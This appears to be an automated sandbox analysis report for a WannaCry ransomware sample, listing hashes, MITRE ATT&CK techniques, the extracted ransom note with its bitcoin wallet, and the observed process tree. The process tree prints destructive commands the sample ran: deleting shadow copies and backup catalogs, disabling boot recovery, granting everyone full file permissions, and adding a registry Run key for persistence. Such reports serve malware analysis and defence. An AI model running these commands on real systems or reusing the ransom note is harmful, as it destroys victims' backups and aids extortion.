wannacry | 219f4e1e62fa50d0e407a6ae5c49344e1a888f97e7131be118d6c312217e69cc

Analysis

max time kernel
1s
max time network
133s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
26-12-2023 06:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin/ed01ebfbc9eb5bbea545af4d01bf5f1.exe
Size

3.4MB
MD5

84c82835a5d21bbcf75a61706d8ab549
SHA1

5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512

90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
SSDEEP

98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB

Score

10^/10

wannacry discovery ransomware worm

Malware Config

Extracted

Path

C:\Users\Admin\Documents\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Executes dropped EXE 1 IoCs

pid	Process
2308	taskdl.exe

Loads dropped DLL 3 IoCs

pid	Process
2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe
2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe
1272	cscript.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2824	icacls.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1740	vssadmin.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2364	reg.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2584 wrote to memory of 2848	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	15
PID 2584 wrote to memory of 2848	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	15
PID 2584 wrote to memory of 2848	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	15
PID 2584 wrote to memory of 2848	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	15
PID 2584 wrote to memory of 2824	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	28
PID 2584 wrote to memory of 2824	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	28
PID 2584 wrote to memory of 2824	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	28
PID 2584 wrote to memory of 2824	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	28
PID 2584 wrote to memory of 2308	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	16
PID 2584 wrote to memory of 2308	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	16
PID 2584 wrote to memory of 2308	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	16
PID 2584 wrote to memory of 2308	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	16
PID 2584 wrote to memory of 3044	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	21
PID 2584 wrote to memory of 3044	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	21
PID 2584 wrote to memory of 3044	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	21
PID 2584 wrote to memory of 3044	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	21
PID 3044 wrote to memory of 1272	3044	cmd.exe	17
PID 3044 wrote to memory of 1272	3044	cmd.exe	17
PID 3044 wrote to memory of 1272	3044	cmd.exe	17
PID 3044 wrote to memory of 1272	3044	cmd.exe	17
PID 2584 wrote to memory of 2468	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	19
PID 2584 wrote to memory of 2468	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	19
PID 2584 wrote to memory of 2468	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	19
PID 2584 wrote to memory of 2468	2584	ed01ebfbc9eb5bbea545af4d01bf5f1.exe	19

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2848	attrib.exe
2468	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\ed01ebfbc9eb5bbea545af4d01bf5f1.exe
"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\ed01ebfbc9eb5bbea545af4d01bf5f1.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2584
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - Views/modifies file attributes
  PID:2848
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2308
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - Views/modifies file attributes
  PID:2468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c 258251703573661.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3044
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  PID:2084
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\@[email protected]
  @[email protected] co
  2⤵
  PID:644
- - C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    PID:2160
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2824
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\taskdl.exe
  taskdl.exe
  2⤵
  PID:1760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "epkpryutff721" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\tasksche.exe\"" /f
  2⤵
  PID:1880
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\@[email protected]
  @[email protected]
  2⤵
  PID:1840
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\@[email protected]
  2⤵
  PID:888
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\taskdl.exe
  taskdl.exe
  2⤵
  PID:2664
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\@[email protected]
  @[email protected]
  2⤵
  PID:2884
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\@[email protected]
  2⤵
  PID:2648
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\@[email protected]
  @[email protected]
  2⤵
  PID:1636
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\@[email protected]
  2⤵
  PID:1696
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\taskdl.exe
  taskdl.exe
  2⤵
  PID:1752
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\@[email protected]
  @[email protected]
  2⤵
  PID:2096
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\@[email protected]
  2⤵
  PID:2992
- C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\taskdl.exe
  taskdl.exe
  2⤵
  PID:692

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
1⤵
- Loads dropped DLL
PID:1272

C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\@[email protected]
@[email protected] vs
1⤵
PID:2256
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  PID:1784

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
1⤵
- Interacts with shadow copies
PID:1740

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
1⤵
PID:1656

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2392

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "epkpryutff721" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.bin\tasksche.exe\"" /f
1⤵
- Modifies registry key
PID:2364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact